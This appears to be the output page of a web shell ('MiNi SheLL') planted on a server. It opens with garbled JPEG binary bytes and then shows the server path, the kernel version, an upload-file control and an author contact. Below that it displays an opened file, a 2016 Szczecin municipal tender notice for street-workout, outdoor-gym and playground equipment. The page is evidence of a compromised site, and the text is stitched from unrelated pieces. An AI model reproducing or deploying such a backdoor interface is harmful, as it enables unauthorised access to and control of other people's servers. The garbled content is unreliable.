JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160704/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160704/117583-N-2016.html

<p class="kh_header"><b>Szczecin: Dostawa i montaż urządzeń do street workout, urządzeń sportowo-rekreacyjnych na siłownie zewnętrzne oraz urządzeń zabawowych na place zabaw (w podziale na części)</b><br>
<b>Numer ogłoszenia: 117583 - 2016; data zamieszczenia: 04.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Usług Komunalnych , ul. Ku Słońcu 125a, 71-080 Szczecin, woj. zachodniopomorskie, tel. 91 484 82 94, faks 91 484 80 55.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.zuk.szczecin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż urządzeń do street workout, urządzeń sportowo-rekreacyjnych na siłownie zewnętrzne oraz urządzeń zabawowych na place zabaw (w podziale na części).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa i montaż urządzeń do street workout, urządzeń sportowo - rekreacyjnych na siłownie zewnętrzne oraz urządzeń zabawowych na place zabaw (w podziale na części), tj.:
1)	 część I - dostawa i  montaż wraz z wykonaniem stref bezpieczeństwa urządzeń 
do street workout, w następujących lokalizacjach:  
a)	zieleniec przy ul. Derdowskiego
b)	Park Chopina
2) część II - dostawa i montaż urządzeń sportowo - rekreacyjnych na siłownie
      zewnętrzne, w następujących lokalizacjach:
 a)   zieleniec przy ul. Przyjaciół  Żołnierza - 5 szt.
 b)   Plac Leona Koczego  - 1 szt.
 c)   zieleniec przy ul. Rayskiego - 5 szt.
3) część III - dostawa i montaż wraz z wykonaniem stref bezpieczeństwa urządzeń zabawowych na place zabaw, w następujących lokalizacjach:
     a)   Plac zabaw przy ul. Zamkniętej
     b)   Plac zabaw przy ul. Dąbrówki
CPV: 
37440000-4 sprzęt do ćwiczeń fizycznych
37420000-8 sprzęt gimnastyczny
433250007 - wyposażenie parków i placów zabaw 
2. 		Wykonawca zobowiązany będzie do wykonania przedmiotu zamówienia opisanego 
 odpowiednio w załącznikach nr 6 - 9 do SIWZ.
3. 	Wykonawca wykona przedmiot zamówienia na zasadzie zapewnienia najwyższej jakości prac, zgodnie z zasadami współczesnej wiedzy technicznej, obowiązującymi normami, przepisami prawa powszechnie obowiązującego, a także z SIWZ i z ofertą, które będą stanowiły integralną część umowy.
4. Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy 
w stosunku do treści oferty polegających na zmianie terminu realizacji.
5. Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy
      w stosunku do treści oferty w przypadku:
1) 	wyjątkowo niesprzyjających warunków atmosferycznych uniemożliwiających wykonanie prac zgodnie z zasadami współczesnej wiedzy technicznej 
i obowiązujących przepisów; W takim przypadku na uzasadniony wniosek Wykonawcy zostanie ustalony nowy termin wykonania przedmiotu umowy, 
co zostanie potwierdzone aneksem do umowy. 
2)	wystąpienia siły wyższej, czyli zdarzenia zewnętrznego, którego skutków nie da się  przewidzieć, np. huragan, powódź; W takim przypadku na uzasadniony wniosek Wykonawcy zostanie ustalony nowy termin wykonania przedmiotu umowy, 
co zostanie potwierdzone aneksem do umowy. 
3)	wystąpienia konieczności wykonania zamówienia dodatkowego, którego realizacja 
ma wpływ na termin wykonania umowy; W takim przypadku na wniosek Wykonawcy lub Zamawiającego, zmiana zostanie wprowadzona aneksem do umowy..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 37.44.00.00-4, 37.42.00.00-8, 43.32.50.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 40.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto wykonawcy mają dołączyć do oferty następujące dokumenty:
      1)  ofertę cenową - zgodnie z rozdziałem I pkt 3 SIWZ;
	W przypadku składania oferty wspólnej należy złożyć jedną ofertę cenową;
2)	odpowiednie pełnomocnictwa;
	Tylko w sytuacjach określonych w rozdziale I pkt 5 zdanie drugie SIWZ lub 
	w przypadku składania oferty wspólnej (rozdział III pkt 1 SIWZ); 
      3)	oświadczenie według wzoru stanowiącego załącznik nr 1 do SIWZ, wskazujące część 	zamówienia, której wykonanie wykonawca powierzy podwykonawcom (jeżeli 	wykonawca przewiduje udział podwykonawców);
            W przypadku składania oferty wspólnej należy złożyć jedno oświadczenie.
      4)   opis oferowanych urządzeń;
W przypadku składania oferty wspólnej należy złożyć jeden wspólny opis.
5)	certyfikaty bezpieczeństwa dot. oferowanych urządzeń, wydane przez jednostki certyfikujące; 
W przypadku składania oferty wspólnej wykonawcy składają jedne wspólne certyfikaty bezpieczeństwa.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Okres gwarancji - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy 
w stosunku do treści oferty polegających na zmianie terminu realizacji.
5. Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy
      w stosunku do treści oferty w przypadku:
1) 	wyjątkowo niesprzyjających warunków atmosferycznych uniemożliwiających wykonanie prac zgodnie z zasadami współczesnej wiedzy technicznej 
i obowiązujących przepisów; W takim przypadku na uzasadniony wniosek Wykonawcy zostanie ustalony nowy termin wykonania przedmiotu umowy, 
co zostanie potwierdzone aneksem do umowy. 
2)	wystąpienia siły wyższej, czyli zdarzenia zewnętrznego, którego skutków nie da się  przewidzieć, np. huragan, powódź; W takim przypadku na uzasadniony wniosek Wykonawcy zostanie ustalony nowy termin wykonania przedmiotu umowy, 
co zostanie potwierdzone aneksem do umowy. 
3)	wystąpienia konieczności wykonania zamówienia dodatkowego, którego realizacja 
ma wpływ na termin wykonania umowy; W takim przypadku na wniosek Wykonawcy lub Zamawiającego, zmiana zostanie wprowadzona aneksem do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zuk.szczecin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego: ul. Ku Słońcu 125A, 71-080 Szczecin, pok.1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.07.2016 godzina 10:00, miejsce: Siedziba Zamawiającego: ul. Ku Słońcu 125A, 71-080 Szczecin, Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zadanie nie dotyczy umowy ramowej.
2. Wykonawca udzieli rękojmi na wykonany przedmiot zamówienia na okres 
36 miesięcy, licząc od dnia podpisania protokołu odbioru końcowego przedmiotu zamówienia. 
3. Wykonawca w ofercie cenowej poda okres gwarancji określony w miesiącach, liczony 
od dnia podpisania protokołu odbioru końcowego przedmiotu zamówienia. Okres gwarancji stanowi jedno z kryteriów oceny ofert. 
4.Warunki gwarancji zostają ustalone w załączniku nr 10 do SIWZ.
5. W przypadku, gdy gwarancja producenta na zastosowane materiały, urządzenia przekracza okres gwarancji zaoferowany przez Wykonawcę, wówczas Wykonawca przekaże Zamawiającemu - wraz z dokumentacją odbiorową - dokumenty pozwalające na skorzystanie z uprawnień wynikających z gwarancji producenta. 
6. Termin wykonania zamówienia: nie dłużej niż 40 dni kalendarzowych od dnia zawarcia umowy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa i montaż wraz z wykonaniem stref bezpieczeństwa urządzeń do street workout w następujących lokalizacjach:
a) zieleniec przy ul. Derdowskiego
b) Park Chopina.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa i montaż urządzeń do street workout, urządzeń sportowo - rekreacyjnych na siłownie zewnętrzne oraz urządzeń zabawowych na place zabaw (w podziale na części), tj.:
1)	 część I - dostawa i  montaż wraz z wykonaniem stref bezpieczeństwa urządzeń 
do street workout, w następujących lokalizacjach:  
a)	zieleniec przy ul. Derdowskiego
b)	Park Chopina

CPV: 
37440000-4 sprzęt do ćwiczeń fizycznych
37420000-8 sprzęt gimnastyczny
433250007 - wyposażenie parków i placów zabaw 
2. 		Wykonawca zobowiązany będzie do wykonania przedmiotu zamówienia opisanego 
 odpowiednio w załącznikach nr 6 - 9 do SIWZ.
3. 	Wykonawca wykona przedmiot zamówienia na zasadzie zapewnienia najwyższej jakości prac, zgodnie z zasadami współczesnej wiedzy technicznej, obowiązującymi normami, przepisami prawa powszechnie obowiązującego, a także z SIWZ i z ofertą, które będą stanowiły integralną część umowy.
4. Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy 
w stosunku do treści oferty polegających na zmianie terminu realizacji.
5. Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy
      w stosunku do treści oferty w przypadku:
1) 	wyjątkowo niesprzyjających warunków atmosferycznych uniemożliwiających wykonanie prac zgodnie z zasadami współczesnej wiedzy technicznej 
i obowiązujących przepisów; W takim przypadku na uzasadniony wniosek Wykonawcy zostanie ustalony nowy termin wykonania przedmiotu umowy, 
co zostanie potwierdzone aneksem do umowy. 
2)	wystąpienia siły wyższej, czyli zdarzenia zewnętrznego, którego skutków nie da się  przewidzieć, np. huragan, powódź; W takim przypadku na uzasadniony wniosek Wykonawcy zostanie ustalony nowy termin wykonania przedmiotu umowy, 
co zostanie potwierdzone aneksem do umowy. 
3)	wystąpienia konieczności wykonania zamówienia dodatkowego, którego realizacja 
ma wpływ na termin wykonania umowy; W takim przypadku na wniosek Wykonawcy lub Zamawiającego, zmiana zostanie wprowadzona aneksem do umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.44.00.00-4, 37.42.00.00-8, 43.32.50.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 40.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa i montaż urządzeń sportowo-rekreacyjnych na siłownie zewnętrzne, w następujących lokalizacjach:
a) zieleniec przy ul. Przyjaciół Żołnierza - 5 szt.
b) Plac Leona Koczego - 1 szt.,
zieleniec przy ul. Rayskiego - 5 szt..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa i montaż urządzeń do street workout, urządzeń sportowo - rekreacyjnych na siłownie zewnętrzne oraz urządzeń zabawowych na place zabaw (w podziale na części), tj.:
2) część II - dostawa i montaż urządzeń sportowo - rekreacyjnych na siłownie
      zewnętrzne, w następujących lokalizacjach:
 a)   zieleniec przy ul. Przyjaciół  Żołnierza - 5 szt.
 b)   Plac Leona Koczego  - 1 szt.
 c)   zieleniec przy ul. Rayskiego - 5 szt.
CPV: 
37440000-4 sprzęt do ćwiczeń fizycznych
37420000-8 sprzęt gimnastyczny
433250007 - wyposażenie parków i placów zabaw 
2. 		Wykonawca zobowiązany będzie do wykonania przedmiotu zamówienia opisanego 
 odpowiednio w załącznikach nr 6 - 9 do SIWZ.
3. 	Wykonawca wykona przedmiot zamówienia na zasadzie zapewnienia najwyższej jakości prac, zgodnie z zasadami współczesnej wiedzy technicznej, obowiązującymi normami, przepisami prawa powszechnie obowiązującego, a także z SIWZ i z ofertą, które będą stanowiły integralną część umowy.
4. Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy 
w stosunku do treści oferty polegających na zmianie terminu realizacji.
5. Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy
      w stosunku do treści oferty w przypadku:
1) 	wyjątkowo niesprzyjających warunków atmosferycznych uniemożliwiających wykonanie prac zgodnie z zasadami współczesnej wiedzy technicznej 
i obowiązujących przepisów; W takim przypadku na uzasadniony wniosek Wykonawcy zostanie ustalony nowy termin wykonania przedmiotu umowy, 
co zostanie potwierdzone aneksem do umowy. 
2)	wystąpienia siły wyższej, czyli zdarzenia zewnętrznego, którego skutków nie da się  przewidzieć, np. huragan, powódź; W takim przypadku na uzasadniony wniosek Wykonawcy zostanie ustalony nowy termin wykonania przedmiotu umowy, 
co zostanie potwierdzone aneksem do umowy. 
3)	wystąpienia konieczności wykonania zamówienia dodatkowego, którego realizacja 
ma wpływ na termin wykonania umowy; W takim przypadku na wniosek Wykonawcy lub Zamawiającego, zmiana zostanie wprowadzona aneksem do umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.44.00.00-4, 37.42.00.00-8, 43.32.50.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 40.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa i montaż wraz z wykonaniem stref bezpieczeństwa urządzeń zabawowych na place zabaw, w następujaąych lokalizacjach:
a) Plac zabaw przy ul. Zamkniętej
b) Plac zabawa przy ul. Dąbrówki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa i montaż urządzeń do street workout, urządzeń sportowo - rekreacyjnych na siłownie zewnętrzne oraz urządzeń zabawowych na place zabaw (w podziale na części), tj.:
3) część III - dostawa i montaż wraz z wykonaniem stref bezpieczeństwa urządzeń zabawowych na place zabaw, w następujących lokalizacjach:
     a)   Plac zabaw przy ul. Zamkniętej
     b)   Plac zabaw przy ul. Dąbrówki
CPV: 
37440000-4 sprzęt do ćwiczeń fizycznych
37420000-8 sprzęt gimnastyczny
433250007 - wyposażenie parków i placów zabaw 
2. 		Wykonawca zobowiązany będzie do wykonania przedmiotu zamówienia opisanego 
 odpowiednio w załącznikach nr 6 - 9 do SIWZ.
3. 	Wykonawca wykona przedmiot zamówienia na zasadzie zapewnienia najwyższej jakości prac, zgodnie z zasadami współczesnej wiedzy technicznej, obowiązującymi normami, przepisami prawa powszechnie obowiązującego, a także z SIWZ i z ofertą, które będą stanowiły integralną część umowy.
4. Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy 
w stosunku do treści oferty polegających na zmianie terminu realizacji.
5. Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy
      w stosunku do treści oferty w przypadku:
1) 	wyjątkowo niesprzyjających warunków atmosferycznych uniemożliwiających wykonanie prac zgodnie z zasadami współczesnej wiedzy technicznej 
i obowiązujących przepisów; W takim przypadku na uzasadniony wniosek Wykonawcy zostanie ustalony nowy termin wykonania przedmiotu umowy, 
co zostanie potwierdzone aneksem do umowy. 
2)	wystąpienia siły wyższej, czyli zdarzenia zewnętrznego, którego skutków nie da się  przewidzieć, np. huragan, powódź; W takim przypadku na uzasadniony wniosek Wykonawcy zostanie ustalony nowy termin wykonania przedmiotu umowy, 
co zostanie potwierdzone aneksem do umowy. 
3)	wystąpienia konieczności wykonania zamówienia dodatkowego, którego realizacja 
ma wpływ na termin wykonania umowy; W takim przypadku na wniosek Wykonawcy lub Zamawiającego, zmiana zostanie wprowadzona aneksem do umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 37.44.00.00-4, 37.42.00.00-8, 43.32.50.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 40.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Okres gwarancji - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com